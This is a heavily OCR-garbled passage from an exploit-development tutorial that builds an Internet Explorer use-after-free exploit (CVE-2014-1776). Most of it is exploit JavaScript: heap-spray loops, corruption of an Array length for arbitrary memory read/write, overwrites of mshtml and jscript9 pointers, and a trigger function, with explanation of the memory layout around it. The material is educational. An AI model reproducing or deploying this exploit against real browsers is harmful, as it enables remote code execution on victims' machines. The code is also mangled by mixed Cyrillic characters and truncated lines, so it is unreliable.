xmlns:v-"urn:schemas-microsoft-com:vml" 
| id="haed" 
ЇЕ Case Study - STEP1«/til 


v\:*{Behavior: url(#default#VML)} 


у neta http-equiv="X-UA- Compatible" content="IE=EmulatelE9" 


=. avascript" 
аа = function() ( 
ge); 
= 0x20; 


var nead 
| = (0x10000 - ће 


var arra 
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= 0xc000000; 


" field of the Arra 


DO За 
r (var i = 0; i < Ox1000 - 1; ++i) { 
len + header. size/4] = 1; 


[ilf 


i (ai 10] == 1) € 


T 0x14/4] = Ox3fffffff; 
+ 0x18/4] = Ox3fffffff; 


= Ox9fffffff; 
= Idr + 0х10000 + 


n int2uint(x) { 
n (x < 0) ? 0x100000000 + 


п uint2intQo ( 
rn (x >= 0x80000000) 2 x - 0x100000000 : х, 
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го 
*1][delta/4]; 


d +1][(0x100000000 + delta)/4]; 


lidx+1][(0x100000000 + lelta)/4] = 


function iddr( 
00 


retur 


+ 0х10000), 


("div"); 
(read( + Oxc) + 8) + 0x10)) - Ox3aeb04; 
tml+O0xebcd98+0x10); 
tml+Oxebcd98+0x14); 


tml+Oxebcd98+0x10, jscript9+0x155e19); 
+0xebcd98+0x14, +0x155d7d); 


http: //expdev-kiuhnm.rhcloud.com 





EXPLOIT DEVELOPMENT COMMUNITY 


јео) 
tml+Oxebcd98+0x10, 
+0херса98+0х14, 


п ада! ldr(bStream); 
idr = Цгеаа(05їгеат addr + 0x50) + 0x44); 
addr, 0x003a0043); 

idr + 4, 0х0000005с); 


(fi 22) 
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As before, | snipped . You сап download the full code гот here: code7. 


Now the calculator pops up and everything seems to work fine until we get a crash. The crash doesn't 
always happen but there's definitely something wrong with the code. A crash is probably caused by an 


incorrect write. Since the God Mode works correctly, the problem must be with the two writes right before the 
call to 


Let's comment out the two writes and try again. Perfect! Now there are no more crashes! But we can't just 
leave out the two writes. If we use SimpleServer, it doesn't work of course because the two writes are 
needed. Maybe surprisingly, if we add back the two writes, everything works just fine. 
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If we investigate things a bit, we discover that when the html page is loaded in IE directly from the hard disk, 

points to а null dword. On the other hand, when the раде is loaded Бу going to and is 
served by SimpleServer, points to the Unicode string . For this reason, we 
should change the code as follows: 


JavaScript 


-addr(bStream); 
read(read(bStream addr + 0x50) + 0x44); 
idr) != 0) { ere is a string 
їг, 0x003a0043); 
Ir + 4, 0х0000005с); 


2) 


Completing the exploit (2) 
It's high time we completed this exploit! Here's the full code: 


XHTML 


html xmins: 

head id-"haed 

itle>IE Case Study - STEP1 
v\:*{Behavior: url(#default#VML)} 


neta http-equiv atible" content="IE=EmulatelE9" /: 
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Oxa4, ma Idr + 0х20 - Oxc, Х 

0x118, n addr + 0x24 + 0x24, 

0x198, -1 > se 
], 0x428); 


O; 
ze = 0x20; 
_len = (0x10000 -t 


V тем/ Аггау(); 
г (var i = 0; i < 0х1000; ++i) { 
new Ar ( ray_ n); 


+ Ox1b - 0x878; ША 
((b[0] + Ox9b0 - ( Idr + 0x20))/4); 
+1] = -1; 
((b[0] + 0xa24 - ( Idr + 0х20))/4); 
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idx+1] = -1; 
((b[0] + 0x1044 - ( ir + 0х20))/4); 
Ix+1] = 0; 
= ((b[0] + 0x208 - ( + 0x20) + 0x10000)/4); 
] = 0; Брах+1] = 0; 
]= Ir + 0x28 - 0х1с; 
24 + 0x24 - 0x20)/4] = 0; 
Idr + Ox2c - Оха; 
((b[2] + 0x44 - (ma idr + 0х20))/4); 
+1] = -1; 


221 
for (var | = 0; i < Ox1000 - 1; ++i) { 
try to тос а 


+h 


Пап 


и (а+1]О] == 1) { 


Леп + 0x14/4] = Ox3fffffff; 
iy len + 0x18/4] = ОхЗН 
h = Ox3fffffff; 
пад idr + 0x10000 + 


http: 
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in int2uint(x) { 
n (x « 0) ? 0x100000000 + 


lint2int(x) { 
(x >= 0х80000000) ? x - 0x100000000 : x; 


= апдх + 1]((0x100000000 + delta)/4]: 


а/4] = val; 


| ix 1][(0x100000000 + lelta)/4] = val; 
) 
function iddr( 
[ОШ 


retur 


* 0x10000); 
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(read( + Охс) + 8) + 0x10)) - Ox3aeb04; 


tml+Oxebcd98+0x10); 
%0херса98--0х14); 


lodeOn() { 
tml+Oxebcd98+0x10, %0х155е19); 
tml+0xebcd98+0x14, jscript9+0x155d7d); 


function | 0t 
(mshtml-0xebcd98-0x10, 
(твһіті--Охерса98--0х14, 


П); 
idr + 0x50) + 0x44); 


ad(read( 
г) != 0) { 
Ir, Ox003a0043); 
ir + 4, 0х0000005с); 


12). 
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Once again, | snipped . You сап download the ІШІ code from here: соде8. 
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This code works fine but IE may crash from time to time. This isn’t a major problem because when the user 
closes the crash dialog box the page is reloaded and the exploit is run again. 


The new code has some subtleties so let’s discuss the important points. Let’s start with 


JavaScript 


1 trigger() { 
r head = document.getElementByld("haed") 


tmp = document.createElement("CVE-2014-1776") 
document.getElementByld("vml").childNodes[0].appendChild(tmp) 
tmp.appendChild(head) 
tmp = head.offsetParent 
tmp.onpropertychange - f 1(){ 
is["removeNode"|(true) 
document.createElement("CVE-2014-1776").title =" 


elem = document.createElement("div"); 
elem.className = getPattern([ 
Оха4, magic_addr + 0x20 - Oxc, 
0x118, magic_addr + 0x24 + 0x24, 
0x198, -1 
], 0x428); 


} 
head. firstChild.nextSibling.disabled = head 
} 





Тре function takes an array of the form 


JavaScript 


[offset 1, value 1, 
offset 2, value 2, 
offset 3, value 3, 





and the size in bytes of the pattern. The pattern returned is a string of the specified size which : 
‚ etc... а the specified offsets. 


| hope the comments are clear enough. For instance, let's consider this line: 


JavaScript 
Оха4, magic addr + 0x20 - Охс, 





This means that 


X = magic addr + 0x20 - Oxc 
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which is defined in a way that 
( in our code). 


points to , where 


To understand this better, let's consider the full schema: 


JavaScript 


tPattern([ 
+ 0x20 - Охс, 


+ 0x24 + 0x24, 


(); 
= 0х20; 
Мо 0000 El 


1); 


Idr + Ox1b - 0x878; 


r((b[0] + Ox9bO - ( 
+1] = -1; 
г((! ІШ + E ( 


ui 


[iet] - 


" s copy ofthe a | 


орах) = 0; brides] = 0; 
[1] = + 0х28 - СЕ 
b[(0x24 + 0x24 - 0x20)/4] = 

b[2] = + 0х2с - $a 


( [0] + 0х1044 - (magic. add 
0; 


+ 0x20))/4); 


Ir + 0x20))/4); 


+ 0х20))/4); 


dr + 0x20) + 0x10000)/4): 


is the first element of the 
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г + 0х20))/4); 





Let’s consider this part of the schema: 


JavaScript 


As we’ve seen, 





JavaScript 





iddr + 0x20 - Oxc, 


means that 


X = [ptr OA4h] = magic addr + 0x20 - Oxc 


so that X+0cx points to b[0]. 


Then we have 


JavaScript 





idr + Ox1b - 0x878; 


which means that 


У = [X*Och] = magic адаг + Ox1b - 0x878 


The schema tells us that [Y+878h] must be the value to increment. Indeed, Y+0x878 is magic addr + Ox1b 
which points to the highest byte of the length of the Array at magic адаг (0xc000000 in our code). Note that 
we increment the dword at magic адаг + 0х1р which has the effect of incrementing the byte at the same 
address. 


The schema also dictates that [Y+208h] be 0. This is accomplished by the following lines: 


JavaScript 


г + 0x20) + 0x10000)/4): 
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Here there are two important points: 


18 У = b[0] = magic_addr + Ox1b — 0x878 so it's not а multiple of 4. Because of this, Y+208h isn't a 
multiple of 4 either. To modify the misaligned dword [Y -208h], we need to modify the dwords [\+2061] 
and [Y *20ah] which coincide with the elements b[idx] and b[idx* 1]. That's why we use Math.floor. 

2. The computed value b[0] + 0x208 — (magic addr + 0x20) is negative. Because we've chosen Y so 
that Y+878h points to the header of the Array at magic addr, Y+9b0h and Y+0a24h (see the schema) 
point to the same Array, but Y+208h points to the previous Array. Every Array will have the same content 
SO, since adjacent Arrays are 0x10000 bytes apart, by writing the value into the memory at address 
Y+208h+10000h (i.e. in the current Array), we'll also end up writing that value into the memory at address 
Y+208h. 


To conclude our discussion, note that the function trigger is called only once. A single increment is more 
than enough because we just need to write а few bytes beyond the end of the Array at magic addr. 
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